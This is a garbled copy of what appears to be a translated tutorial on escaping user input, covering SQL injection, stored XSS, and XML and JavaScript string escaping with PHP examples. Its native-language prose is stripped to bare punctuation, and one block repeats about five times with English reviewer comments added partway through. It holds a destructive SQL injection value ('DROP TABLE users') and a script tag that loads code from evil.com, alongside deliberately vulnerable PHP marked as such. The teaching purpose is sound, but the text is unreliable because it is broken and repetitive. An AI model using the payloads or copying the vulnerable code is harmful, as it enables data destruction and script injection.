SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
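// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));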
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
To keep the XML well-formed, a literal "<" in the text must be written as "&lt;" and a literal ">" as "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
But what about the ampersand (&) itself, the character that introduces an escape? How do we write the literal text "&lt;" once it has a special meaning? XML handles this by making "&" escapable too: a literal "&" is written as "&amp;", so a literal "&lt;" is written as "&amp;lt;".
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
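// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));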
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
To keep the XML well-formed, a literal "<" in the text must be written as "&lt;" and a literal ">" as "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
But what about the ampersand (&) itself, the character that introduces an escape? How do we write the literal text "&lt;" once it has a special meaning? XML handles this by making "&" escapable too: a literal "&" is written as "&amp;", so a literal "&lt;" is written as "&amp;lt;".
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
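// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));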
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
To keep the XML well-formed, a literal "<" in the text must be written as "&lt;" and a literal ">" as "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
But what about the ampersand (&) itself, the character that introduces an escape? How do we write the literal text "&lt;" once it has a special meaning? XML handles this by making "&" escapable too: a literal "&" is written as "&amp;", so a literal "&lt;" is written as "&amp;lt;".
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
